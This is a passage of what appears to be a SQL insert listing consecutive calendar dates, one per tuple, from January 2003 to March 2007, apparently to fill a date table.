('2003-01-30'),
('2003-01-31'),
('2003-02-01'),
('2003-02-02'),
('2003-02-03'),
('2003-02-04'),
('2003-02-05'),
('2003-02-06'),
('2003-02-07'),
('2003-02-08'),
('2003-02-09'),
('2003-02-10'),
('2003-02-11'),
('2003-02-12'),
('2003-02-13'),
('2003-02-14'),
('2003-02-15'),
('2003-02-16'),
('2003-02-17'),
('2003-02-18'),
('2003-02-19'),
('2003-02-20'),
('2003-02-21'),
('2003-02-22'),
('2003-02-23'),
('2003-02-24'),
('2003-02-25'),
('2003-02-26'),
('2003-02-27'),
('2003-02-28'),
('2003-03-01'),
('2003-03-02'),
('2003-03-03'),
('2003-03-04'),
('2003-03-05'),
('2003-03-06'),
('2003-03-07'),
('2003-03-08'),
('2003-03-09'),
('2003-03-10'),
('2003-03-11'),
('2003-03-12'),
('2003-03-13'),
('2003-03-14'),
('2003-03-15'),
('2003-03-16'),
('2003-03-17'),
('2003-03-18'),
('2003-03-19'),
('2003-03-20'),
('2003-03-21'),
('2003-03-22'),
('2003-03-23'),
('2003-03-24'),
('2003-03-25'),
('2003-03-26'),
('2003-03-27'),
('2003-03-28'),
('2003-03-29'),
('2003-03-30'),
('2003-03-31'),
('2003-04-01'),
('2003-04-02'),
('2003-04-03'),
('2003-04-04'),
('2003-04-05'),
('2003-04-06'),
('2003-04-07'),
('2003-04-08'),
('2003-04-09'),
('2003-04-10'),
('2003-04-11'),
('2003-04-12'),
('2003-04-13'),
('2003-04-14'),
('2003-04-15'),
('2003-04-16'),
('2003-04-17'),
('2003-04-18'),
('2003-04-19'),
('2003-04-20'),
('2003-04-21'),
('2003-04-22'),
('2003-04-23'),
('2003-04-24'),
('2003-04-25'),
('2003-04-26'),
('2003-04-27'),
('2003-04-28'),
('2003-04-29'),
('2003-04-30'),
('2003-05-01'),
('2003-05-02'),
('2003-05-03'),
('2003-05-04'),
('2003-05-05'),
('2003-05-06'),
('2003-05-07'),
('2003-05-08'),
('2003-05-09'),
('2003-05-10'),
('2003-05-11'),
('2003-05-12'),
('2003-05-13'),
('2003-05-14'),
('2003-05-15'),
('2003-05-16'),
('2003-05-17'),
('2003-05-18'),
('2003-05-19'),
('2003-05-20'),
('2003-05-21'),
('2003-05-22'),
('2003-05-23'),
('2003-05-24'),
('2003-05-25'),
('2003-05-26'),
('2003-05-27'),
('2003-05-28'),
('2003-05-29'),
('2003-05-30'),
('2003-05-31'),
('2003-06-01'),
('2003-06-02'),
('2003-06-03'),
('2003-06-04'),
('2003-06-05'),
('2003-06-06'),
('2003-06-07'),
('2003-06-08'),
('2003-06-09'),
('2003-06-10'),
('2003-06-11'),
('2003-06-12'),
('2003-06-13'),
('2003-06-14'),
('2003-06-15'),
('2003-06-16'),
('2003-06-17'),
('2003-06-18'),
('2003-06-19'),
('2003-06-20'),
('2003-06-21'),
('2003-06-22'),
('2003-06-23'),
('2003-06-24'),
('2003-06-25'),
('2003-06-26'),
('2003-06-27'),
('2003-06-28'),
('2003-06-29'),
('2003-06-30'),
('2003-07-01'),
('2003-07-02'),
('2003-07-03'),
('2003-07-04'),
('2003-07-05'),
('2003-07-06'),
('2003-07-07'),
('2003-07-08'),
('2003-07-09'),
('2003-07-10'),
('2003-07-11'),
('2003-07-12'),
('2003-07-13'),
('2003-07-14'),
('2003-07-15'),
('2003-07-16'),
('2003-07-17'),
('2003-07-18'),
('2003-07-19'),
('2003-07-20'),
('2003-07-21'),
('2003-07-22'),
('2003-07-23'),
('2003-07-24'),
('2003-07-25'),
('2003-07-26'),
('2003-07-27'),
('2003-07-28'),
('2003-07-29'),
('2003-07-30'),
('2003-07-31'),
('2003-08-01'),
('2003-08-02'),
('2003-08-03'),
('2003-08-04'),
('2003-08-05'),
('2003-08-06'),
('2003-08-07'),
('2003-08-08'),
('2003-08-09'),
('2003-08-10'),
('2003-08-11'),
('2003-08-12'),
('2003-08-13'),
('2003-08-14'),
('2003-08-15'),
('2003-08-16'),
('2003-08-17'),
('2003-08-18'),
('2003-08-19'),
('2003-08-20'),
('2003-08-21'),
('2003-08-22'),
('2003-08-23'),
('2003-08-24'),
('2003-08-25'),
('2003-08-26'),
('2003-08-27'),
('2003-08-28'),
('2003-08-29'),
('2003-08-30'),
('2003-08-31'),
('2003-09-01'),
('2003-09-02'),
('2003-09-03'),
('2003-09-04'),
('2003-09-05'),
('2003-09-06'),
('2003-09-07'),
('2003-09-08'),
('2003-09-09'),
('2003-09-10'),
('2003-09-11'),
('2003-09-12'),
('2003-09-13'),
('2003-09-14'),
('2003-09-15'),
('2003-09-16'),
('2003-09-17'),
('2003-09-18'),
('2003-09-19'),
('2003-09-20'),
('2003-09-21'),
('2003-09-22'),
('2003-09-23'),
('2003-09-24'),
('2003-09-25'),
('2003-09-26'),
('2003-09-27'),
('2003-09-28'),
('2003-09-29'),
('2003-09-30'),
('2003-10-01'),
('2003-10-02'),
('2003-10-03'),
('2003-10-04'),
('2003-10-05'),
('2003-10-06'),
('2003-10-07'),
('2003-10-08'),
('2003-10-09'),
('2003-10-10'),
('2003-10-11'),
('2003-10-12'),
('2003-10-13'),
('2003-10-14'),
('2003-10-15'),
('2003-10-16'),
('2003-10-17'),
('2003-10-18'),
('2003-10-19'),
('2003-10-20'),
('2003-10-21'),
('2003-10-22'),
('2003-10-23'),
('2003-10-24'),
('2003-10-25'),
('2003-10-26'),
('2003-10-27'),
('2003-10-28'),
('2003-10-29'),
('2003-10-30'),
('2003-10-31'),
('2003-11-01'),
('2003-11-02'),
('2003-11-03'),
('2003-11-04'),
('2003-11-05'),
('2003-11-06'),
('2003-11-07'),
('2003-11-08'),
('2003-11-09'),
('2003-11-10'),
('2003-11-11'),
('2003-11-12'),
('2003-11-13'),
('2003-11-14'),
('2003-11-15'),
('2003-11-16'),
('2003-11-17'),
('2003-11-18'),
('2003-11-19'),
('2003-11-20'),
('2003-11-21'),
('2003-11-22'),
('2003-11-23'),
('2003-11-24'),
('2003-11-25'),
('2003-11-26'),
('2003-11-27'),
('2003-11-28'),
('2003-11-29'),
('2003-11-30'),
('2003-12-01'),
('2003-12-02'),
('2003-12-03'),
('2003-12-04'),
('2003-12-05'),
('2003-12-06'),
('2003-12-07'),
('2003-12-08'),
('2003-12-09'),
('2003-12-10'),
('2003-12-11'),
('2003-12-12'),
('2003-12-13'),
('2003-12-14'),
('2003-12-15'),
('2003-12-16'),
('2003-12-17'),
('2003-12-18'),
('2003-12-19'),
('2003-12-20'),
('2003-12-21'),
('2003-12-22'),
('2003-12-23'),
('2003-12-24'),
('2003-12-25'),
('2003-12-26'),
('2003-12-27'),
('2003-12-28'),
('2003-12-29'),
('2003-12-30'),
('2003-12-31'),
('2004-01-01'),
('2004-01-02'),
('2004-01-03'),
('2004-01-04'),
('2004-01-05'),
('2004-01-06'),
('2004-01-07'),
('2004-01-08'),
('2004-01-09'),
('2004-01-10'),
('2004-01-11'),
('2004-01-12'),
('2004-01-13'),
('2004-01-14'),
('2004-01-15'),
('2004-01-16'),
('2004-01-17'),
('2004-01-18'),
('2004-01-19'),
('2004-01-20'),
('2004-01-21'),
('2004-01-22'),
('2004-01-23'),
('2004-01-24'),
('2004-01-25'),
('2004-01-26'),
('2004-01-27'),
('2004-01-28'),
('2004-01-29'),
('2004-01-30'),
('2004-01-31'),
('2004-02-01'),
('2004-02-02'),
('2004-02-03'),
('2004-02-04'),
('2004-02-05'),
('2004-02-06'),
('2004-02-07'),
('2004-02-08'),
('2004-02-09'),
('2004-02-10'),
('2004-02-11'),
('2004-02-12'),
('2004-02-13'),
('2004-02-14'),
('2004-02-15'),
('2004-02-16'),
('2004-02-17'),
('2004-02-18'),
('2004-02-19'),
('2004-02-20'),
('2004-02-21'),
('2004-02-22'),
('2004-02-23'),
('2004-02-24'),
('2004-02-25'),
('2004-02-26'),
('2004-02-27'),
('2004-02-28'),
('2004-02-29'),
('2004-03-01'),
('2004-03-02'),
('2004-03-03'),
('2004-03-04'),
('2004-03-05'),
('2004-03-06'),
('2004-03-07'),
('2004-03-08'),
('2004-03-09'),
('2004-03-10'),
('2004-03-11'),
('2004-03-12'),
('2004-03-13'),
('2004-03-14'),
('2004-03-15'),
('2004-03-16'),
('2004-03-17'),
('2004-03-18'),
('2004-03-19'),
('2004-03-20'),
('2004-03-21'),
('2004-03-22'),
('2004-03-23'),
('2004-03-24'),
('2004-03-25'),
('2004-03-26'),
('2004-03-27'),
('2004-03-28'),
('2004-03-29'),
('2004-03-30'),
('2004-03-31'),
('2004-04-01'),
('2004-04-02'),
('2004-04-03'),
('2004-04-04'),
('2004-04-05'),
('2004-04-06'),
('2004-04-07'),
('2004-04-08'),
('2004-04-09'),
('2004-04-10'),
('2004-04-11'),
('2004-04-12'),
('2004-04-13'),
('2004-04-14'),
('2004-04-15'),
('2004-04-16'),
('2004-04-17'),
('2004-04-18'),
('2004-04-19'),
('2004-04-20'),
('2004-04-21'),
('2004-04-22'),
('2004-04-23'),
('2004-04-24'),
('2004-04-25'),
('2004-04-26'),
('2004-04-27'),
('2004-04-28'),
('2004-04-29'),
('2004-04-30'),
('2004-05-01'),
('2004-05-02'),
('2004-05-03'),
('2004-05-04'),
('2004-05-05'),
('2004-05-06'),
('2004-05-07'),
('2004-05-08'),
('2004-05-09'),
('2004-05-10'),
('2004-05-11'),
('2004-05-12'),
('2004-05-13'),
('2004-05-14'),
('2004-05-15'),
('2004-05-16'),
('2004-05-17'),
('2004-05-18'),
('2004-05-19'),
('2004-05-20'),
('2004-05-21'),
('2004-05-22'),
('2004-05-23'),
('2004-05-24'),
('2004-05-25'),
('2004-05-26'),
('2004-05-27'),
('2004-05-28'),
('2004-05-29'),
('2004-05-30'),
('2004-05-31'),
('2004-06-01'),
('2004-06-02'),
('2004-06-03'),
('2004-06-04'),
('2004-06-05'),
('2004-06-06'),
('2004-06-07'),
('2004-06-08'),
('2004-06-09'),
('2004-06-10'),
('2004-06-11'),
('2004-06-12'),
('2004-06-13'),
('2004-06-14'),
('2004-06-15'),
('2004-06-16'),
('2004-06-17'),
('2004-06-18'),
('2004-06-19'),
('2004-06-20'),
('2004-06-21'),
('2004-06-22'),
('2004-06-23'),
('2004-06-24'),
('2004-06-25'),
('2004-06-26'),
('2004-06-27'),
('2004-06-28'),
('2004-06-29'),
('2004-06-30'),
('2004-07-01'),
('2004-07-02'),
('2004-07-03'),
('2004-07-04'),
('2004-07-05'),
('2004-07-06'),
('2004-07-07'),
('2004-07-08'),
('2004-07-09'),
('2004-07-10'),
('2004-07-11'),
('2004-07-12'),
('2004-07-13'),
('2004-07-14'),
('2004-07-15'),
('2004-07-16'),
('2004-07-17'),
('2004-07-18'),
('2004-07-19'),
('2004-07-20'),
('2004-07-21'),
('2004-07-22'),
('2004-07-23'),
('2004-07-24'),
('2004-07-25'),
('2004-07-26'),
('2004-07-27'),
('2004-07-28'),
('2004-07-29'),
('2004-07-30'),
('2004-07-31'),
('2004-08-01'),
('2004-08-02'),
('2004-08-03'),
('2004-08-04'),
('2004-08-05'),
('2004-08-06'),
('2004-08-07'),
('2004-08-08'),
('2004-08-09'),
('2004-08-10'),
('2004-08-11'),
('2004-08-12'),
('2004-08-13'),
('2004-08-14'),
('2004-08-15'),
('2004-08-16'),
('2004-08-17'),
('2004-08-18'),
('2004-08-19'),
('2004-08-20'),
('2004-08-21'),
('2004-08-22'),
('2004-08-23'),
('2004-08-24'),
('2004-08-25'),
('2004-08-26'),
('2004-08-27'),
('2004-08-28'),
('2004-08-29'),
('2004-08-30'),
('2004-08-31'),
('2004-09-01'),
('2004-09-02'),
('2004-09-03'),
('2004-09-04'),
('2004-09-05'),
('2004-09-06'),
('2004-09-07'),
('2004-09-08'),
('2004-09-09'),
('2004-09-10'),
('2004-09-11'),
('2004-09-12'),
('2004-09-13'),
('2004-09-14'),
('2004-09-15'),
('2004-09-16'),
('2004-09-17'),
('2004-09-18'),
('2004-09-19'),
('2004-09-20'),
('2004-09-21'),
('2004-09-22'),
('2004-09-23'),
('2004-09-24'),
('2004-09-25'),
('2004-09-26'),
('2004-09-27'),
('2004-09-28'),
('2004-09-29'),
('2004-09-30'),
('2004-10-01'),
('2004-10-02'),
('2004-10-03'),
('2004-10-04'),
('2004-10-05'),
('2004-10-06'),
('2004-10-07'),
('2004-10-08'),
('2004-10-09'),
('2004-10-10'),
('2004-10-11'),
('2004-10-12'),
('2004-10-13'),
('2004-10-14'),
('2004-10-15'),
('2004-10-16'),
('2004-10-17'),
('2004-10-18'),
('2004-10-19'),
('2004-10-20'),
('2004-10-21'),
('2004-10-22'),
('2004-10-23'),
('2004-10-24'),
('2004-10-25'),
('2004-10-26'),
('2004-10-27'),
('2004-10-28'),
('2004-10-29'),
('2004-10-30'),
('2004-10-31'),
('2004-11-01'),
('2004-11-02'),
('2004-11-03'),
('2004-11-04'),
('2004-11-05'),
('2004-11-06'),
('2004-11-07'),
('2004-11-08'),
('2004-11-09'),
('2004-11-10'),
('2004-11-11'),
('2004-11-12'),
('2004-11-13'),
('2004-11-14'),
('2004-11-15'),
('2004-11-16'),
('2004-11-17'),
('2004-11-18'),
('2004-11-19'),
('2004-11-20'),
('2004-11-21'),
('2004-11-22'),
('2004-11-23'),
('2004-11-24'),
('2004-11-25'),
('2004-11-26'),
('2004-11-27'),
('2004-11-28'),
('2004-11-29'),
('2004-11-30'),
('2004-12-01'),
('2004-12-02'),
('2004-12-03'),
('2004-12-04'),
('2004-12-05'),
('2004-12-06'),
('2004-12-07'),
('2004-12-08'),
('2004-12-09'),
('2004-12-10'),
('2004-12-11'),
('2004-12-12'),
('2004-12-13'),
('2004-12-14'),
('2004-12-15'),
('2004-12-16'),
('2004-12-17'),
('2004-12-18'),
('2004-12-19'),
('2004-12-20'),
('2004-12-21'),
('2004-12-22'),
('2004-12-23'),
('2004-12-24'),
('2004-12-25'),
('2004-12-26'),
('2004-12-27'),
('2004-12-28'),
('2004-12-29'),
('2004-12-30'),
('2004-12-31'),
('2005-01-01'),
('2005-01-02'),
('2005-01-03'),
('2005-01-04'),
('2005-01-05'),
('2005-01-06'),
('2005-01-07'),
('2005-01-08'),
('2005-01-09'),
('2005-01-10'),
('2005-01-11'),
('2005-01-12'),
('2005-01-13'),
('2005-01-14'),
('2005-01-15'),
('2005-01-16'),
('2005-01-17'),
('2005-01-18'),
('2005-01-19'),
('2005-01-20'),
('2005-01-21'),
('2005-01-22'),
('2005-01-23'),
('2005-01-24'),
('2005-01-25'),
('2005-01-26'),
('2005-01-27'),
('2005-01-28'),
('2005-01-29'),
('2005-01-30'),
('2005-01-31'),
('2005-02-01'),
('2005-02-02'),
('2005-02-03'),
('2005-02-04'),
('2005-02-05'),
('2005-02-06'),
('2005-02-07'),
('2005-02-08'),
('2005-02-09'),
('2005-02-10'),
('2005-02-11'),
('2005-02-12'),
('2005-02-13'),
('2005-02-14'),
('2005-02-15'),
('2005-02-16'),
('2005-02-17'),
('2005-02-18'),
('2005-02-19'),
('2005-02-20'),
('2005-02-21'),
('2005-02-22'),
('2005-02-23'),
('2005-02-24'),
('2005-02-25'),
('2005-02-26'),
('2005-02-27'),
('2005-02-28'),
('2005-03-01'),
('2005-03-02'),
('2005-03-03'),
('2005-03-04'),
('2005-03-05'),
('2005-03-06'),
('2005-03-07'),
('2005-03-08'),
('2005-03-09'),
('2005-03-10'),
('2005-03-11'),
('2005-03-12'),
('2005-03-13'),
('2005-03-14'),
('2005-03-15'),
('2005-03-16'),
('2005-03-17'),
('2005-03-18'),
('2005-03-19'),
('2005-03-20'),
('2005-03-21'),
('2005-03-22'),
('2005-03-23'),
('2005-03-24'),
('2005-03-25'),
('2005-03-26'),
('2005-03-27'),
('2005-03-28'),
('2005-03-29'),
('2005-03-30'),
('2005-03-31'),
('2005-04-01'),
('2005-04-02'),
('2005-04-03'),
('2005-04-04'),
('2005-04-05'),
('2005-04-06'),
('2005-04-07'),
('2005-04-08'),
('2005-04-09'),
('2005-04-10'),
('2005-04-11'),
('2005-04-12'),
('2005-04-13'),
('2005-04-14'),
('2005-04-15'),
('2005-04-16'),
('2005-04-17'),
('2005-04-18'),
('2005-04-19'),
('2005-04-20'),
('2005-04-21'),
('2005-04-22'),
('2005-04-23'),
('2005-04-24'),
('2005-04-25'),
('2005-04-26'),
('2005-04-27'),
('2005-04-28'),
('2005-04-29'),
('2005-04-30'),
('2005-05-01'),
('2005-05-02'),
('2005-05-03'),
('2005-05-04'),
('2005-05-05'),
('2005-05-06'),
('2005-05-07'),
('2005-05-08'),
('2005-05-09'),
('2005-05-10'),
('2005-05-11'),
('2005-05-12'),
('2005-05-13'),
('2005-05-14'),
('2005-05-15'),
('2005-05-16'),
('2005-05-17'),
('2005-05-18'),
('2005-05-19'),
('2005-05-20'),
('2005-05-21'),
('2005-05-22'),
('2005-05-23'),
('2005-05-24'),
('2005-05-25'),
('2005-05-26'),
('2005-05-27'),
('2005-05-28'),
('2005-05-29'),
('2005-05-30'),
('2005-05-31'),
('2005-06-01'),
('2005-06-02'),
('2005-06-03'),
('2005-06-04'),
('2005-06-05'),
('2005-06-06'),
('2005-06-07'),
('2005-06-08'),
('2005-06-09'),
('2005-06-10'),
('2005-06-11'),
('2005-06-12'),
('2005-06-13'),
('2005-06-14'),
('2005-06-15'),
('2005-06-16'),
('2005-06-17'),
('2005-06-18'),
('2005-06-19'),
('2005-06-20'),
('2005-06-21'),
('2005-06-22'),
('2005-06-23'),
('2005-06-24'),
('2005-06-25'),
('2005-06-26'),
('2005-06-27'),
('2005-06-28'),
('2005-06-29'),
('2005-06-30'),
('2005-07-01'),
('2005-07-02'),
('2005-07-03'),
('2005-07-04'),
('2005-07-05'),
('2005-07-06'),
('2005-07-07'),
('2005-07-08'),
('2005-07-09'),
('2005-07-10'),
('2005-07-11'),
('2005-07-12'),
('2005-07-13'),
('2005-07-14'),
('2005-07-15'),
('2005-07-16'),
('2005-07-17'),
('2005-07-18'),
('2005-07-19'),
('2005-07-20'),
('2005-07-21'),
('2005-07-22'),
('2005-07-23'),
('2005-07-24'),
('2005-07-25'),
('2005-07-26'),
('2005-07-27'),
('2005-07-28'),
('2005-07-29'),
('2005-07-30'),
('2005-07-31'),
('2005-08-01'),
('2005-08-02'),
('2005-08-03'),
('2005-08-04'),
('2005-08-05'),
('2005-08-06'),
('2005-08-07'),
('2005-08-08'),
('2005-08-09'),
('2005-08-10'),
('2005-08-11'),
('2005-08-12'),
('2005-08-13'),
('2005-08-14'),
('2005-08-15'),
('2005-08-16'),
('2005-08-17'),
('2005-08-18'),
('2005-08-19'),
('2005-08-20'),
('2005-08-21'),
('2005-08-22'),
('2005-08-23'),
('2005-08-24'),
('2005-08-25'),
('2005-08-26'),
('2005-08-27'),
('2005-08-28'),
('2005-08-29'),
('2005-08-30'),
('2005-08-31'),
('2005-09-01'),
('2005-09-02'),
('2005-09-03'),
('2005-09-04'),
('2005-09-05'),
('2005-09-06'),
('2005-09-07'),
('2005-09-08'),
('2005-09-09'),
('2005-09-10'),
('2005-09-11'),
('2005-09-12'),
('2005-09-13'),
('2005-09-14'),
('2005-09-15'),
('2005-09-16'),
('2005-09-17'),
('2005-09-18'),
('2005-09-19'),
('2005-09-20'),
('2005-09-21'),
('2005-09-22'),
('2005-09-23'),
('2005-09-24'),
('2005-09-25'),
('2005-09-26'),
('2005-09-27'),
('2005-09-28'),
('2005-09-29'),
('2005-09-30'),
('2005-10-01'),
('2005-10-02'),
('2005-10-03'),
('2005-10-04'),
('2005-10-05'),
('2005-10-06'),
('2005-10-07'),
('2005-10-08'),
('2005-10-09'),
('2005-10-10'),
('2005-10-11'),
('2005-10-12'),
('2005-10-13'),
('2005-10-14'),
('2005-10-15'),
('2005-10-16'),
('2005-10-17'),
('2005-10-18'),
('2005-10-19'),
('2005-10-20'),
('2005-10-21'),
('2005-10-22'),
('2005-10-23'),
('2005-10-24'),
('2005-10-25'),
('2005-10-26'),
('2005-10-27'),
('2005-10-28'),
('2005-10-29'),
('2005-10-30'),
('2005-10-31'),
('2005-11-01'),
('2005-11-02'),
('2005-11-03'),
('2005-11-04'),
('2005-11-05'),
('2005-11-06'),
('2005-11-07'),
('2005-11-08'),
('2005-11-09'),
('2005-11-10'),
('2005-11-11'),
('2005-11-12'),
('2005-11-13'),
('2005-11-14'),
('2005-11-15'),
('2005-11-16'),
('2005-11-17'),
('2005-11-18'),
('2005-11-19'),
('2005-11-20'),
('2005-11-21'),
('2005-11-22'),
('2005-11-23'),
('2005-11-24'),
('2005-11-25'),
('2005-11-26'),
('2005-11-27'),
('2005-11-28'),
('2005-11-29'),
('2005-11-30'),
('2005-12-01'),
('2005-12-02'),
('2005-12-03'),
('2005-12-04'),
('2005-12-05'),
('2005-12-06'),
('2005-12-07'),
('2005-12-08'),
('2005-12-09'),
('2005-12-10'),
('2005-12-11'),
('2005-12-12'),
('2005-12-13'),
('2005-12-14'),
('2005-12-15'),
('2005-12-16'),
('2005-12-17'),
('2005-12-18'),
('2005-12-19'),
('2005-12-20'),
('2005-12-21'),
('2005-12-22'),
('2005-12-23'),
('2005-12-24'),
('2005-12-25'),
('2005-12-26'),
('2005-12-27'),
('2005-12-28'),
('2005-12-29'),
('2005-12-30'),
('2005-12-31'),
('2006-01-01'),
('2006-01-02'),
('2006-01-03'),
('2006-01-04'),
('2006-01-05'),
('2006-01-06'),
('2006-01-07'),
('2006-01-08'),
('2006-01-09'),
('2006-01-10'),
('2006-01-11'),
('2006-01-12'),
('2006-01-13'),
('2006-01-14'),
('2006-01-15'),
('2006-01-16'),
('2006-01-17'),
('2006-01-18'),
('2006-01-19'),
('2006-01-20'),
('2006-01-21'),
('2006-01-22'),
('2006-01-23'),
('2006-01-24'),
('2006-01-25'),
('2006-01-26'),
('2006-01-27'),
('2006-01-28'),
('2006-01-29'),
('2006-01-30'),
('2006-01-31'),
('2006-02-01'),
('2006-02-02'),
('2006-02-03'),
('2006-02-04'),
('2006-02-05'),
('2006-02-06'),
('2006-02-07'),
('2006-02-08'),
('2006-02-09'),
('2006-02-10'),
('2006-02-11'),
('2006-02-12'),
('2006-02-13'),
('2006-02-14'),
('2006-02-15'),
('2006-02-16'),
('2006-02-17'),
('2006-02-18'),
('2006-02-19'),
('2006-02-20'),
('2006-02-21'),
('2006-02-22'),
('2006-02-23'),
('2006-02-24'),
('2006-02-25'),
('2006-02-26'),
('2006-02-27'),
('2006-02-28'),
('2006-03-01'),
('2006-03-02'),
('2006-03-03'),
('2006-03-04'),
('2006-03-05'),
('2006-03-06'),
('2006-03-07'),
('2006-03-08'),
('2006-03-09'),
('2006-03-10'),
('2006-03-11'),
('2006-03-12'),
('2006-03-13'),
('2006-03-14'),
('2006-03-15'),
('2006-03-16'),
('2006-03-17'),
('2006-03-18'),
('2006-03-19'),
('2006-03-20'),
('2006-03-21'),
('2006-03-22'),
('2006-03-23'),
('2006-03-24'),
('2006-03-25'),
('2006-03-26'),
('2006-03-27'),
('2006-03-28'),
('2006-03-29'),
('2006-03-30'),
('2006-03-31'),
('2006-04-01'),
('2006-04-02'),
('2006-04-03'),
('2006-04-04'),
('2006-04-05'),
('2006-04-06'),
('2006-04-07'),
('2006-04-08'),
('2006-04-09'),
('2006-04-10'),
('2006-04-11'),
('2006-04-12'),
('2006-04-13'),
('2006-04-14'),
('2006-04-15'),
('2006-04-16'),
('2006-04-17'),
('2006-04-18'),
('2006-04-19'),
('2006-04-20'),
('2006-04-21'),
('2006-04-22'),
('2006-04-23'),
('2006-04-24'),
('2006-04-25'),
('2006-04-26'),
('2006-04-27'),
('2006-04-28'),
('2006-04-29'),
('2006-04-30'),
('2006-05-01'),
('2006-05-02'),
('2006-05-03'),
('2006-05-04'),
('2006-05-05'),
('2006-05-06'),
('2006-05-07'),
('2006-05-08'),
('2006-05-09'),
('2006-05-10'),
('2006-05-11'),
('2006-05-12'),
('2006-05-13'),
('2006-05-14'),
('2006-05-15'),
('2006-05-16'),
('2006-05-17'),
('2006-05-18'),
('2006-05-19'),
('2006-05-20'),
('2006-05-21'),
('2006-05-22'),
('2006-05-23'),
('2006-05-24'),
('2006-05-25'),
('2006-05-26'),
('2006-05-27'),
('2006-05-28'),
('2006-05-29'),
('2006-05-30'),
('2006-05-31'),
('2006-06-01'),
('2006-06-02'),
('2006-06-03'),
('2006-06-04'),
('2006-06-05'),
('2006-06-06'),
('2006-06-07'),
('2006-06-08'),
('2006-06-09'),
('2006-06-10'),
('2006-06-11'),
('2006-06-12'),
('2006-06-13'),
('2006-06-14'),
('2006-06-15'),
('2006-06-16'),
('2006-06-17'),
('2006-06-18'),
('2006-06-19'),
('2006-06-20'),
('2006-06-21'),
('2006-06-22'),
('2006-06-23'),
('2006-06-24'),
('2006-06-25'),
('2006-06-26'),
('2006-06-27'),
('2006-06-28'),
('2006-06-29'),
('2006-06-30'),
('2006-07-01'),
('2006-07-02'),
('2006-07-03'),
('2006-07-04'),
('2006-07-05'),
('2006-07-06'),
('2006-07-07'),
('2006-07-08'),
('2006-07-09'),
('2006-07-10'),
('2006-07-11'),
('2006-07-12'),
('2006-07-13'),
('2006-07-14'),
('2006-07-15'),
('2006-07-16'),
('2006-07-17'),
('2006-07-18'),
('2006-07-19'),
('2006-07-20'),
('2006-07-21'),
('2006-07-22'),
('2006-07-23'),
('2006-07-24'),
('2006-07-25'),
('2006-07-26'),
('2006-07-27'),
('2006-07-28'),
('2006-07-29'),
('2006-07-30'),
('2006-07-31'),
('2006-08-01'),
('2006-08-02'),
('2006-08-03'),
('2006-08-04'),
('2006-08-05'),
('2006-08-06'),
('2006-08-07'),
('2006-08-08'),
('2006-08-09'),
('2006-08-10'),
('2006-08-11'),
('2006-08-12'),
('2006-08-13'),
('2006-08-14'),
('2006-08-15'),
('2006-08-16'),
('2006-08-17'),
('2006-08-18'),
('2006-08-19'),
('2006-08-20'),
('2006-08-21'),
('2006-08-22'),
('2006-08-23'),
('2006-08-24'),
('2006-08-25'),
('2006-08-26'),
('2006-08-27'),
('2006-08-28'),
('2006-08-29'),
('2006-08-30'),
('2006-08-31'),
('2006-09-01'),
('2006-09-02'),
('2006-09-03'),
('2006-09-04'),
('2006-09-05'),
('2006-09-06'),
('2006-09-07'),
('2006-09-08'),
('2006-09-09'),
('2006-09-10'),
('2006-09-11'),
('2006-09-12'),
('2006-09-13'),
('2006-09-14'),
('2006-09-15'),
('2006-09-16'),
('2006-09-17'),
('2006-09-18'),
('2006-09-19'),
('2006-09-20'),
('2006-09-21'),
('2006-09-22'),
('2006-09-23'),
('2006-09-24'),
('2006-09-25'),
('2006-09-26'),
('2006-09-27'),
('2006-09-28'),
('2006-09-29'),
('2006-09-30'),
('2006-10-01'),
('2006-10-02'),
('2006-10-03'),
('2006-10-04'),
('2006-10-05'),
('2006-10-06'),
('2006-10-07'),
('2006-10-08'),
('2006-10-09'),
('2006-10-10'),
('2006-10-11'),
('2006-10-12'),
('2006-10-13'),
('2006-10-14'),
('2006-10-15'),
('2006-10-16'),
('2006-10-17'),
('2006-10-18'),
('2006-10-19'),
('2006-10-20'),
('2006-10-21'),
('2006-10-22'),
('2006-10-23'),
('2006-10-24'),
('2006-10-25'),
('2006-10-26'),
('2006-10-27'),
('2006-10-28'),
('2006-10-29'),
('2006-10-30'),
('2006-10-31'),
('2006-11-01'),
('2006-11-02'),
('2006-11-03'),
('2006-11-04'),
('2006-11-05'),
('2006-11-06'),
('2006-11-07'),
('2006-11-08'),
('2006-11-09'),
('2006-11-10'),
('2006-11-11'),
('2006-11-12'),
('2006-11-13'),
('2006-11-14'),
('2006-11-15'),
('2006-11-16'),
('2006-11-17'),
('2006-11-18'),
('2006-11-19'),
('2006-11-20'),
('2006-11-21'),
('2006-11-22'),
('2006-11-23'),
('2006-11-24'),
('2006-11-25'),
('2006-11-26'),
('2006-11-27'),
('2006-11-28'),
('2006-11-29'),
('2006-11-30'),
('2006-12-01'),
('2006-12-02'),
('2006-12-03'),
('2006-12-04'),
('2006-12-05'),
('2006-12-06'),
('2006-12-07'),
('2006-12-08'),
('2006-12-09'),
('2006-12-10'),
('2006-12-11'),
('2006-12-12'),
('2006-12-13'),
('2006-12-14'),
('2006-12-15'),
('2006-12-16'),
('2006-12-17'),
('2006-12-18'),
('2006-12-19'),
('2006-12-20'),
('2006-12-21'),
('2006-12-22'),
('2006-12-23'),
('2006-12-24'),
('2006-12-25'),
('2006-12-26'),
('2006-12-27'),
('2006-12-28'),
('2006-12-29'),
('2006-12-30'),
('2006-12-31'),
('2007-01-01'),
('2007-01-02'),
('2007-01-03'),
('2007-01-04'),
('2007-01-05'),
('2007-01-06'),
('2007-01-07'),
('2007-01-08'),
('2007-01-09'),
('2007-01-10'),
('2007-01-11'),
('2007-01-12'),
('2007-01-13'),
('2007-01-14'),
('2007-01-15'),
('2007-01-16'),
('2007-01-17'),
('2007-01-18'),
('2007-01-19'),
('2007-01-20'),
('2007-01-21'),
('2007-01-22'),
('2007-01-23'),
('2007-01-24'),
('2007-01-25'),
('2007-01-26'),
('2007-01-27'),
('2007-01-28'),
('2007-01-29'),
('2007-01-30'),
('2007-01-31'),
('2007-02-01'),
('2007-02-02'),
('2007-02-03'),
('2007-02-04'),
('2007-02-05'),
('2007-02-06'),
('2007-02-07'),
('2007-02-08'),
('2007-02-09'),
('2007-02-10'),
('2007-02-11'),
('2007-02-12'),
('2007-02-13'),
('2007-02-14'),
('2007-02-15'),
('2007-02-16'),
('2007-02-17'),
('2007-02-18'),
('2007-02-19'),
('2007-02-20'),
('2007-02-21'),
('2007-02-22'),
('2007-02-23'),
('2007-02-24'),
('2007-02-25'),
('2007-02-26'),
('2007-02-27'),
('2007-02-28'),
('2007-03-01'),
('2007-03-02'),
('2007-03-03'),
('2007-03-04'),
('2007-03-05'),
('2007-03-06'),
('2007-03-07'),
('2007-03-08'),
('2007-03-09'),
